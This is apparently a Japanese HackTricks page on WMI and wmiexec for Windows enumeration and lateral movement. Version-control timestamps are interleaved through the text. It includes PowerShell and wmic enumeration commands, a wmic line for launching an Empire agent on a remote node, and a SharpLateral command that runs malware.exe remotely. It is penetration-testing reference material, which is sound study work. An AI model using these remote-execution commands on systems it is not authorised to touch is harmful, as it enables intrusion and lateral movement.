2022-08-13 23:06:40 +00:00
# WmicExec
2022-04-28 16:01:33 +00:00
< details >
2024-02-04 16:27:51 +00:00
< summary > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > を通じてゼロからヒーローまでAWSハッキングを学ぶ< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-04 16:27:51 +00:00
HackTricksをサポートする他の方法:
2024-01-02 22:36:59 +00:00
2024-02-04 16:27:51 +00:00
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS& HackTricksスワッグ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* **💬 [Discordグループ ](https://discord.gg/hRep4RUj7f )**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で私をフォローする:[**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **ハッキングトリックを共有するために、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2024-02-04 16:27:51 +00:00
## 動作の説明
2022-04-28 16:01:33 +00:00
2024-02-04 16:27:51 +00:00
ユーザー名とパスワードまたはハッシュがわかっているホストでプロセスを開くことができます。WMIを使用してコマンドを実行し、Wmiexecによって半インタラクティブなシェル体験を提供します。
2020-07-15 15:43:14 +00:00
2024-02-04 16:27:51 +00:00
**dcomexec.py:** 異なるDCOMエンドポイントを利用し、このスクリプトはWmiexec.pyに似た半インタラクティブなシェルを提供します。具体的には、ShellBrowserWindow DCOMオブジェクトを活用しています。現在、MMC20、Application、Shell Windows、Shell Browser Windowオブジェクトをサポートしています。( 出典: [Hacking Articles](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/))
2020-07-15 15:43:14 +00:00
2024-02-04 16:27:51 +00:00
## WMIの基礎
2021-01-20 17:41:14 +00:00
2024-02-04 16:27:51 +00:00
### 名前空間
2021-01-20 17:41:14 +00:00
2024-02-04 16:27:51 +00:00
ディレクトリスタイルの階層構造で構成されており、WMIのトップレベルコンテナは\rootで、その下に名前空間として組織された追加のディレクトリがあります。
名前空間をリストするコマンド:
2021-01-20 17:41:14 +00:00
```bash
2024-02-04 16:27:51 +00:00
# Retrieval of Root namespaces
2021-01-20 17:41:14 +00:00
gwmi -namespace "root" -Class "__Namespace" | Select Name
2024-02-04 16:27:51 +00:00
# Enumeration of all namespaces (administrator privileges may be required)
2021-01-20 17:41:14 +00:00
Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | select __Namespace | sort __Namespace
2024-02-04 16:27:51 +00:00
# Listing of namespaces within "root\cimv2"
2021-01-20 17:41:14 +00:00
Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace
```
2024-02-04 16:27:51 +00:00
特定の名前空間内のクラスは、次のコマンドを使用してリストできます:
2021-01-20 17:41:14 +00:00
```bash
2024-02-04 16:27:51 +00:00
gwmwi -List -Recurse # Defaults to "root\cimv2" if no namespace specified
2021-01-20 17:41:14 +00:00
gwmi -Namespace "root/microsoft" -List -Recurse
```
2023-07-07 23:42:27 +00:00
### **クラス**
2021-01-20 17:41:14 +00:00
2024-02-04 16:27:51 +00:00
WMIクラス名( 例: win32\_process) とそれが存在する名前空間を知ることは、WMI操作にとって重要です。
`win32` で始まるクラスをリストするコマンド:
2021-01-20 17:41:14 +00:00
```bash
2024-02-04 16:27:51 +00:00
Get-WmiObject -Recurse -List -class win32* | more # Defaults to "root\cimv2"
2021-01-20 17:41:14 +00:00
gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"
```
2024-02-04 16:27:51 +00:00
クラスの呼び出し:
2021-01-20 17:41:14 +00:00
```bash
2024-02-04 16:27:51 +00:00
# Defaults to "root/cimv2" when namespace isn't specified
2021-01-20 17:41:14 +00:00
Get-WmiObject -Class win32_share
Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus
```
2024-02-04 16:27:51 +00:00
### メソッド
2021-01-20 17:41:14 +00:00
2024-02-04 16:27:51 +00:00
メソッドは、WMIクラスの1つ以上の実行可能な機能です。
2021-01-20 23:53:30 +00:00
```bash
2024-02-04 16:27:51 +00:00
# Class loading, method listing, and execution
2021-01-20 23:53:30 +00:00
$c = [wmiclass]"win32_share"
$c.methods
2024-02-04 16:27:51 +00:00
# To create a share: $c.Create("c:\share\path","name",0,$null,"My Description")
2021-01-20 23:53:30 +00:00
```
```bash
2024-02-04 16:27:51 +00:00
# Method listing and invocation
2021-01-20 23:53:30 +00:00
Invoke-WmiMethod -Class win32_share -Name Create -ArgumentList @($null, "Description", $null, "Name", $null, "c:\share\path",0)
```
2024-02-04 16:27:51 +00:00
## WMI列挙
2021-01-20 17:41:14 +00:00
2024-02-04 16:27:51 +00:00
### WMIサービスの状態
2021-01-20 17:41:14 +00:00
2024-02-04 16:27:51 +00:00
WMIサービスが稼働しているかどうかを確認するコマンド:
2021-01-20 17:41:14 +00:00
```bash
2024-02-04 16:27:51 +00:00
# WMI service status check
2021-01-20 17:41:14 +00:00
Get-Service Winmgmt
2024-02-04 16:27:51 +00:00
# Via CMD
2021-01-20 17:41:14 +00:00
net start | findstr "Instrumentation"
```
2024-02-04 16:27:51 +00:00
### システムおよびプロセス情報
WMIを介してシステムおよびプロセス情報を収集する:
2021-01-20 17:41:14 +00:00
```bash
2023-07-07 23:42:27 +00:00
Get-WmiObject -ClassName win32_operatingsystem | select * | more
Get-WmiObject win32_process | Select Name, Processid
2022-08-13 23:06:40 +00:00
```
2024-02-04 16:27:51 +00:00
攻撃者にとって、WMIはシステムやドメインに関する機密データを列挙するための強力なツールです。
```bash
2023-07-07 23:42:27 +00:00
wmic computerystem list full /format:list
wmic process list /format:list
wmic ntdomain list /format:list
wmic useraccount list /format:list
wmic group list /format:list
wmic sysaccount list /format:list
2020-07-15 15:43:14 +00:00
```
2024-02-04 16:27:51 +00:00
### **手動リモートWMIクエリ**
2020-07-15 15:43:14 +00:00
2024-02-04 16:27:51 +00:00
特定の情報( 例: ローカル管理者またはログオンユーザー) を取得するために、慎重なコマンド構築を行うことで、リモートでWMIをクエリすることが可能です。
2020-07-15 15:43:14 +00:00
2024-02-04 16:27:51 +00:00
リモートマシン上でのローカル管理者のステルス識別やログオンユーザーの特定は、特定のWMIクエリを使用して達成できます。`wmic`は、複数のノードでコマンドを同時に実行するために、テキストファイルから読み取ることもサポートしています。
2023-12-26 22:04:57 +00:00
2024-02-04 16:27:51 +00:00
Empireエージェントを展開するなど、WMIを介してプロセスをリモートで実行するには、以下のコマンド構造が使用され、正常な実行は「0」という戻り値で示されます。
2023-07-07 23:42:27 +00:00
```bash
2024-02-04 16:27:51 +00:00
wmic /node:hostname /user:user path win32_process call create "empire launcher string here"
2023-07-07 23:42:27 +00:00
```
2024-02-04 16:27:51 +00:00
このプロセスは、WMIのリモート実行およびシステム列挙の機能を示し、システム管理およびペネトレーションテストの両方での有用性を強調しています。
2023-12-26 22:04:57 +00:00
2020-07-15 15:43:14 +00:00
2024-02-04 16:27:51 +00:00
# 参考文献
* [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/ ](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/ )
2022-04-28 16:01:33 +00:00
2023-12-26 22:04:57 +00:00
## 自動ツール
2022-04-28 16:01:33 +00:00
2023-12-26 22:04:57 +00:00
* [**SharpLateral** ](https://github.com/mertdas/SharpLateral ):
2022-04-28 16:01:33 +00:00
2023-12-26 22:04:57 +00:00
{% code overflow="wrap" %}
```bash
SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
```
2024-01-02 22:36:59 +00:00
{% endcode %}
2023-12-26 22:04:57 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-02-04 16:27:51 +00:00
< summary > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > でAWSハッキングをゼロからヒーローまで学ぶ< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-04 16:27:51 +00:00
HackTricks をサポートする他の方法:
2024-01-02 22:36:59 +00:00
2024-02-04 16:27:51 +00:00
* **HackTricks で企業を宣伝したい**場合や **HackTricks をPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS& HackTricksのグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な [**NFTs** ](https://opensea.io/collection/the-peass-family )のコレクションを見つける
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や [**telegramグループ** ](https://t.me/peass )に **参加**したり、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )を **フォロー**する
* **ハッキングテクニックを共有するために、** [**HackTricks** ](https://github.com/carlospolop/hacktricks )と [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) のGitHubリポジトリにPRを提出する
2022-04-28 16:01:33 +00:00
< / details >